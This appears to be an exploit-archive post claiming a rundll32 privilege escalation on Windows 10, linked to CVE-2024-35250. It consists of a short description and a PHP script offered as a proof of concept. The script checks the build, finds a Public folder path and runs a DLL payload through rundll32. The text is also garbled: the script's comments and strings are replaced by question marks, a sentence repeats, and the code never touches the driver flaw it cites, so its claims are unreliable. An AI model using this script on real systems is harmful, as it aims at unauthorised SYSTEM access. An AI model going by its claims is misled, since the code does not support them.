Microsoft Windows 10 Famille 10.0.19045.5487 (rundll32) Privilege Escalation

A privilege escalation vulnerability existed in Microsoft Windows 10 Famille, A privilege escalation vulnerability existed in Microsoft Windows 10 Famille, impacting versions around build 10.0.19045.5487. This flaw leveraged the `rundll32.exe` utility, a legitimate Windows program designed to run functions from Dynamic Link Libraries (DLLs).

The vulnerability typically involved an unprivileged attacker exploiting how `rundll32` loads or resolves DLLs. By manipulating search paths or tricking a privileged process (or `rundll32` itself when invoked in a specific context) into loading a malicious DLL, the attacker could achieve arbitrary code execution with elevated privileges.

This allowed a standard user to escalate their access to SYSTEM-level, gaining full control over the affected system. Microsoft addressed these types of vulnerabilities through security updates, patching the improper handling of DLL loading or path resolution to prevent unauthorized code execution.

=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (rundll32) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This code is written in PHP and aims to exploit a Local vulnerability in Windows if the system is infected, with support for all different languages, ensuring the correct path to use the payload is specified.

Exploiting CVE-2024-35250 vulnerability in Windows with support for all languages ??and running payload via rundll32

(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .

[+] Usage : php poc.php

[+] PayLoad :


<?php
/**
* ??????? ???? CVE-2024-35250 ?? Windows ?? ??? ???? ??????
*/

function getWindowsLCID() {
$output = shell_exec('wmic os get locale /value');
preg_match('/Locale=(\w+)/', $output, $matches);
return isset($matches[1]) ? hexdec($matches[1]) : 1033; // ?????????: ??????????
}

function localeToLanguage($locale) {
$languages = [
1033 => ['English', 'C:\\Users\\Public\\'], // en-US
1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
1046 => ['Portuguese', 'C:\\Usu?rios\\Public\\'], // pt-BR
1031 => ['German', 'C:\\Benutzer\\?ffentlich\\'], // de-DE
1049 => ['Russian', 'C:\\????????????\\?????\\'], // ru-RU
1056 => ['Persian', 'C:\\???????\\?????\\'], // fa-IR
1025 => ['Arabic', 'C:\\??????????\\???\\'], // ar-SA
1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN (??? ??????????)
1114 => ['Aramaic', 'C:\\???????\\??????\\'], // ????????
1037 => ['Hebrew', 'C:\\???????\\??????\\'], // he-IL
2052 => ['Chinese (Simplified)', 'C:\\??\\??\\'], // zh-CN
1028 => ['Chinese (Traditional)', 'C:\\???\\??\\'], // zh-TW
1041 => ['Japanese', 'C:\\????\\?????\\'], // ja-JP
1042 => ['Korean', 'C:\\???\\??\\'], // ko-KR
1054 => ['Thai', 'C:\\??????\\???????\\'], // th-TH
1066 => ['Vietnamese', 'C:\\Ng??i d?ng\\C?ng c?ng\\'], // vi-VN
];

return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; // ?????????: ??????????
}

function getPublicPath() {
$locale = getWindowsLCID();
list($lang, $path) = localeToLanguage($locale);
echo "[+] ??? ??????: $lang (LCID: $locale)\n";
return $path;
}

function is64BitWindows() {
return (PHP_INT_SIZE === 8);
}

function checkVulnerableDriver() {
$winDir = getenv('WINDIR');
$driverPath = $winDir . '\\system32\\drivers\\ks.sys';

if (!file_exists($driverPath)) {
die("[X] ?? ??? ?????? ??? ks.sys? ?????? ??? ???? ?????????.\n");
}

echo "[+] ks.sys ????? ?? ??????: $driverPath\n";
return true;
}

function getWindowsBuildNumber() {
$output = shell_exec('wmic os get BuildNumber /value');
preg_match('/BuildNumber=(\d+)/', $output, $matches);
return $matches[1] ?? null;
}

function isVulnerableVersion($buildNumber) {
$vulnerableBuilds = range(14393, 19045); // ?? Windows 10 1607 ??? Windows 10 22H2
return in_array($buildNumber, $vulnerableBuilds);
}

function exploit() {
if (!is64BitWindows()) {
die("[X] ?????? ??? 64 ??? ????????? ??? ????.\n");
}

if (!checkVulnerableDriver()) {
die("[X] ?? ???? ?????? ?????????.\n");
}

$buildNumber = getWindowsBuildNumber();
if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
die("[X] ????? Windows ??? ?????: $buildNumber\n");
}

echo "[+] ?? ?????? ?? ??????? ???? ????? ?????? ????...\n";

$publicPath = getPublicPath();
$payloadPath = $publicPath . "exploit_payload.dll";

echo "[+] ???? ??????? ??????: $payloadPath\n";

$notepad = shell_exec('start /B notepad.exe'); // ????? notepad ???????? ??? DLL
sleep(1);

echo "[+] ?? ????? Notepad? ????? ???????...\n";
shell_exec("rundll32 $payloadPath,Inject"); // ????? ??????? ??? rundll32
}

exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================